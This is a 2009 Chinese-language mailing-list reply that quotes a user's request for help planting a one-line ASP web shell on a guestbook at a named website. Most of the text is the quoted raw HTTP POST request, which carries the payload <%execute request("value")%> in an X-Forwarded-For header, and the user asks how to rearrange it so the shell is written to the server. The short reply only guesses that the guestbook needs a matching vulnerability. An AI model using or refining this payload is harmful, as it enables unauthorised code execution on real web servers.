脚本不太懂不过似乎需要留言本程序有相关的洞才行 2009/7/17 milfl0ver <[email protected]>
> 用post提交工具,可以成功提交留言并得到一句话木马。 > 但是我通过nc提交却只能提交留言,却得不到一句话。 > 我这样修改的数据包: > > POST /ly/gustbook.asp?lanmu=0&action=add HTTP/1.1 > Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, > application/x-shockwave-flash, application/msword, application/vnd.ms- > excel, application/vnd.ms-powerpoint, */* > Referer: http://sshsh.com/ly/gustbook.asp > Accept-Language: zh-cn > Content-Type: application/x-www-form-urlencoded > Accept-Encoding: gzip, deflate > User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; > Sicent; QQDownload 551) > Host: sshsh.com > Content-Length: 60 > Connection: Keep-Alive > Cache-Control: no-cache > Cookie: ASPSESSIONIDCSBRADDB=IIODEJCAPJKECJCIJHCMFCPA > HTTP-X-FORWARDED-FOR:<%execute request("value")%> > > mingzi=123&biaoti=321&neirong=123321&Submit.x=74&Submit.y=62 > > 也试了把HTTP-X-FORWARDED-FOR:<%execute request("value")%>这一栏换到Connection: > Keep-Alive这一栏后面或者其他位置,但是都不能成功得到一句话,只能成功提交留言。请知道的朋友给我一个正确的修改这个数据包的格式。先谢谢 > 了哈! > > > -- I am aking --~--~---------~--~----~------------~-------~--~----~ 要向邮件组发送邮件,请发到 [email protected] 要退订此邮件,请发邮件至 [email protected] -~----------~----~----~----~------~----~------~--~---
